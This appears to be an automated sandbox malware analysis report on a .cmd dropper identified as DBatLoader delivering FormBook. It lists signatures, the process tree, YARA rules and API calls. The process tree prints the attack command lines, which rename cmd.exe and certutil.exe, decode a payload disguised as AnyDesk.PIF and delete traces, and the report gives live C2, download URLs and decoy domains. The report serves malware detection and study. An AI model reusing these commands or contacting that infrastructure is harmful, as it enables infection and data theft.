Windows Analysis Report
A1 igazol#U00e1s.cmd

Overview

General Information

Sample name: A1 igazol#U00e1s.cmd
renamed because original name is a hash value
Original sample name: A1 igazols.cmd
Analysis ID: 1563771
MD5: ebdec3ea8aada5aae98146f1b61a13ed
SHA1: 9ed537ca66a14b296010eccdde716b1b1a629fe2
SHA256: 6650a769ac035e23964c16c27df892d7725f415dee92582a4c7b4ceeef7345b2
Tags: cmd, HUN, user-smica83
Infos:

Detection

DBatLoader, FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected FormBook
AI detected suspicious sample
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates a thread in another existing process (thread injection)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Registers a new ROOT certificate
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to resolve many domain names, but no domain seems valid
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Child Processes Of SndVol.exe
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 7808 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 7896 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7916 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 7936 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7956 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7972 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 8012 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 8040 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • AnyDesk.PIF (PID: 8064 cmdline: C:\Users\Public\Libraries\AnyDesk.PIF MD5: A8AF2D572217E48EEEBDF7DD135F90CD)
      • cmd.exe (PID: 7280 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aoikokpI.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • esentutl.exe (PID: 7460 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • SndVol.exe (PID: 7528 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
        • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
          • msdt.exe (PID: 4040 cmdline: "C:\Windows\SysWOW64\msdt.exe" MD5: BAA4458E429E7C906560FE4541ADFCFB)
            • cmd.exe (PID: 2288 cmdline: /c del "C:\Windows\SysWOW64\SndVol.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 4152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • alpha.exe (PID: 8080 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 8100 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
{"Download Url": ["https://aquadream.rs/244_Ipkokioahlp"]}
{"C2 list": ["www.atingdilse.site/d05n/"], "decoy": ["cdrama.site", "ise142.xyz", "ynthia-mcc-lin-tick.link", "askabirokulmumkun.online", "tpdayakslot888.top", "adikoyescortatings.xyz", "ybzert.online", "ujdd.shop", "90yhj301.top", "2xiezhen.net", "uickerandeasier.store", "ode.xyz", "9838.xyz", "gsbet.net", "ustavoglins.store", "evelupcasino.club", "826mza.top", "eanliving.site", "87crxy301.top", "amzlo.shop", "rmt.xyz", "cductcleaning102.fun", "hechefsexperience.info", "joops.music", "ultangaziescortbayanlari.online", "arot-chat.online", "dipisci-harum.site", "kd00.top", "caffolding-17822.bond", "wdes83904.vip", "nilink.education", "egos.design", "nline-advertising-95315.bond", "ental-implants-50062.bond", "apaescortatings.xyz", "r-outsourcing-69869.bond", "card.boats", "affodilconsignment.shop", "rafting-minecraft.link", "ittycozy.shop", "itchen-appliances-55012.bond", "rnuah.xyz", "h8gq8vzm9j.buzz", "espasaigon.online", "ursing-caregiver-jobs-za-3.bond", "yzsports200.xyz", "enies.top", "zziof2.xyz", "estspacefox.shop", "buod.info", "ichetgouttiere.link", "egakids.shop", "xc31.top", "ebsiteclients.online", "trl-migrate.online", "uantumgrovedesignstudio.online", "ajagacor777bar.art", "ynapticshiftai.tech", "irdewagacor89.lat", "amlouis.music", "aim79.online", "upta.bio", "druei.info", "utobahncollision.shop"]}
Source | Rule | Description | Author | Strings
00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x18819:$sqlite3step: 68 34 1C 7B E1
      • 0x1892c:$sqlite3step: 68 34 1C 7B E1
      • 0x18848:$sqlite3text: 68 38 2A 90 C5
      • 0x1896d:$sqlite3text: 68 38 2A 90 C5
      • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
Source | Rule | Description | Author | Strings
17.2.SndVol.exe.4990000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
17.2.SndVol.exe.4990000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
17.2.SndVol.exe.4990000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bd90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
17.2.SndVol.exe.4990000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aaf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bafa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
17.2.SndVol.exe.4990000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x17a19:$sqlite3step: 68 34 1C 7B E1
          • 0x17b2c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a48:$sqlite3text: 68 38 2A 90 C5
          • 0x17b6d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b83:$sqlite3blob: 68 53 D8 7F 8C

          System Summary

Source: File created | Author: frack113, Nasreddine Bencherchali | Data: EventID: 11, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 8064, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7808, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7916, ProcessName: alpha.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 7916, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7936, ProcessName: extrac32.exe
Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 185.102.77.43, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\AnyDesk.PIF, Initiated: true, ProcessId: 8064, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49705
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\AnyDesk.PIF, NewProcessName: C:\Users\Public\Libraries\AnyDesk.PIF, OriginalFileName: C:\Users\Public\Libraries\AnyDesk.PIF, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7808, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 8064, ProcessName: AnyDesk.PIF
Source: Process started | Author: X__Junior (Nextron Systems) | Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: C:\Windows\System32\SndVol.exe, ParentImage: C:\Windows\SysWOW64\SndVol.exe, ParentProcessId: 7528, ParentProcessName: SndVol.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 4084, ProcessName: explorer.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-27T13:22:15.857386+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49706 | 185.102.77.43 | 443 | TCP

          AV Detection

Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.atingdilse.site/d05n/"], "decoy": ["cdrama.site", "ise142.xyz", "ynthia-mcc-lin-tick.link", "askabirokulmumkun.online", "tpdayakslot888.top", "adikoyescortatings.xyz", "ybzert.online", "ujdd.shop", "90yhj301.top", "2xiezhen.net", "uickerandeasier.store", "ode.xyz", "9838.xyz", "gsbet.net", "ustavoglins.store", "evelupcasino.club", "826mza.top", "eanliving.site", "87crxy301.top", "amzlo.shop", "rmt.xyz", "cductcleaning102.fun", "hechefsexperience.info", "joops.music", "ultangaziescortbayanlari.online", "arot-chat.online", "dipisci-harum.site", "kd00.top", "caffolding-17822.bond", "wdes83904.vip", "nilink.education", "egos.design", "nline-advertising-95315.bond", "ental-implants-50062.bond", "apaescortatings.xyz", "r-outsourcing-69869.bond", "card.boats", "affodilconsignment.shop", "rafting-minecraft.link", "ittycozy.shop", "itchen-appliances-55012.bond", "rnuah.xyz", "h8gq8vzm9j.buzz", "espasaigon.online", "ursing-caregiver-jobs-za-3.bond", "yzsports200.xyz", "enies.top", "zziof2.xyz", "estspacefox.shop", "buod.info", "ichetgouttiere.link", "egakids.shop", "xc31.top", "ebsiteclients.online", "trl-migrate.online", "uantumgrovedesignstudio.online", "ajagacor777bar.art", "ynapticshiftai.tech", "irdewagacor89.lat", "amlouis.music", "aim79.online", "upta.bio", "druei.info", "utobahncollision.shop"]}
Source: 10.0.AnyDesk.PIF.400000.0.unpack | Malware Configuration Extractor: DBatLoader {"Download Url": ["https://aquadream.rs/244_Ipkokioahlp"]}
Source: A1 igazol#U00e1s.cmd | ReversingLabs: Detection: 15%
Source: Yara match | File source: 17.2.SndVol.exe.4990000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.AnyDesk.PIF.21e40000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.AnyDesk.PIF.21e40000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.SndVol.exe.4990000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.0% probability
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Joe Sandbox ML: detected
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF685422F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF685422F38
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF685422C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,7_2_00007FF685422C2C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF685484694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,7_2_00007FF685484694
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF685446694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,7_2_00007FF685446694
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854E6654 NCryptGetProperty,#360,7_2_00007FF6854E6654
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68547A654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,7_2_00007FF68547A654
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854A2724 CryptDecodeObject,GetLastError,#357,7_2_00007FF6854A2724
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854526E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,7_2_00007FF6854526E0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854E66D8 NCryptFreeObject,#360,7_2_00007FF6854E66D8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854D86D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,7_2_00007FF6854D86D8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854EA590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF6854EA590
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854AE57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,7_2_00007FF6854AE57C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854B65B4 NCryptIsKeyHandle,_CxxThrowException,7_2_00007FF6854B65B4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68551A58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,7_2_00007FF68551A58C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF685438600 #357,CryptDecodeObject,GetLastError,LocalFree,7_2_00007FF685438600
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF685440630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF685440630
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68543C5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,7_2_00007FF68543C5D4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854725E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,7_2_00007FF6854725E8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68551E8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,7_2_00007FF68551E8B0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854B0844 BCryptExportKey,#205,#359,#357,#357,7_2_00007FF6854B0844
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854E4914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6854E4914
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68549E914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,7_2_00007FF68549E914
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68542A8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,7_2_00007FF68542A8CC
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854B08EC BCryptGetProperty,#205,#359,#357,#357,7_2_00007FF6854B08EC
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854B07A4 BCryptDestroyHash,#205,#357,7_2_00007FF6854B07A4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854B0740 BCryptCloseAlgorithmProvider,#205,#357,#357,7_2_00007FF6854B0740
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854EA740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6854EA740
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854E8814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,7_2_00007FF6854E8814
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF685436824 CryptHashCertificate,GetLastError,#357,7_2_00007FF685436824
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854C07D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF6854C07D0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854167CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6854167CC
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854A27BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6854A27BC
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68549C7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF68549C7F0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854B07F4 BCryptDestroyKey,#205,#357,7_2_00007FF6854B07F4
